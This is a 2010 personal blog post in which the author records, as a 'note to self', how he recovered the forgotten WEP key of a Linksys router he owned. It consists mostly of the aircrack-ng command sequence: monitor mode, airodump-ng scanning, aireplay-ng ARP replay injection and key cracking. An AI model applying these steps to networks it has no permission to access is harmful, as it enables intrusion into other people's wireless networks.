From the Canyon Edge -- :-Dustin

Tuesday, November 30, 2010

These aren't the droids you're looking for

I recently inherited a disused Linksys wireless router. The previous owner had long since forgotten the WEP passphrase (although he still had embedded devices around the house that were connected to the WAP). Of course, it's trivial to reset a Linksys router back to the factory defaults, which I would use eventually. But before I did that, I thought I would try something else first.

Having never tried to crack a WEP key before, I thought this would be a nice opportunity to learn how. There are plenty of excellent, detailed tutorials out there. And this blog post isn't one of them.

It's merely a "note to self" -- what worked for me at this point in time. So if you're looking for a detailed explanation of the process or perhaps support in your quest, "These aren't the droids you're looking for. Move along, move along."

First, I created a directory to store the captured packets.
DIR=$(mktemp -d)
cd $DIR
I then installed the utilities from the 10.10 archive.
sudo apt-get install aircrack-ng
Next, I checked my interface.
sudo airmon-ng check wlan0
And I stopped any services using wlan0 (avahi-daemon, NetworkManager, wpa_supplicant). Then I started monitoring mode on the interface.
sudo airmon-ng start wlan0
Now, I needed to scan the airwaves, looking for my access point.
sudo airodump-ng mon0
When I recognized the ESSID I was looking for, I noted the BSSID and Channel number. Then, I started replaying ARP requests.
sudo aireplay-ng -3 -b $bssid -h 00:00:00:00:00:00 wlan0
I let this run for a while in one window. At the same time, I started capturing replies in another window.
sudo airodump-ng --channel $channel --bssid $bssid --write dump wlan0
And in a third window, I started analyzing the captured data, looking for the key.
sudo aircrack-ng *cap
It took about ~7500 ARP requests and IVs gathered over ~2 hours to divine the key, but it worked eventually, like a charm!